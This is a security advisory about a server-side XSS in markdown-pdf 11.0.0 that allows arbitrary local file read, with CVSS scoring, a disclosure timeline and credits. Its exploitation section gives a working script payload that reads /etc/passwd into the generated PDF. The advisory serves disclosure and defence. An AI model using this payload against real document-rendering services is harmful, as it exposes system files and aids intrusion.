markdown-pdf 11.0.0 - Local File Read via Server Side XSS

Summary

Namemarkdown-pdf 11.0.0 - Local File Read
Code name
Productmarkdown-pdf
Affected versionsVersion 11.0.0
StatePublic
Release date2023-04-10

Vulnerability

KindServer Side XSS
Rule
RemoteYes
CVSSv3.1 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSSv3.1 Base Score7.5
Exploit availableYes
CVE ID(s)

Description

markdown-pdf version 11.0.0 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the Markdown content entered by the user.

Vulnerability

This vulnerability occurs because the application does not validate that the Markdown content entered by the user is not malicious.

Exploitation

To exploit this vulnerability, we only need to send the following malicious Markdown to markdown-pdf:

Exploit.md

<script> // Path Disclosure document.write(window.location); // Arbitrary Local File Read xhr = new XMLHttpRequest; xhr.onload=function(){document.write((this.responseText))}; xhr.open("GET","file:///etc/passwd"); xhr.send(); </script>

Thus, when markdown-pdf parses the malicious Markdown, it will return the local file specified in the generated PDF.

Evidence of exploitation

LFR-Node-PDF

Our security policy

We have reserved the ID CVE-2023-0835 to refer to this issue from now on.

System Information

  • Version: electron-pdf 11.0.0

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://www.npmjs.com/package/markdown-pdf/

Timeline

Time-lapse-logo

2023-02-20

Vulnerability discovered.

Time-lapse-logo

2023-02-20

Vendor contacted.

Time-lapse-logo

2023-02-20

Vendor replied acknowledging the report.

Time-lapse-logo

2023-04-10

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.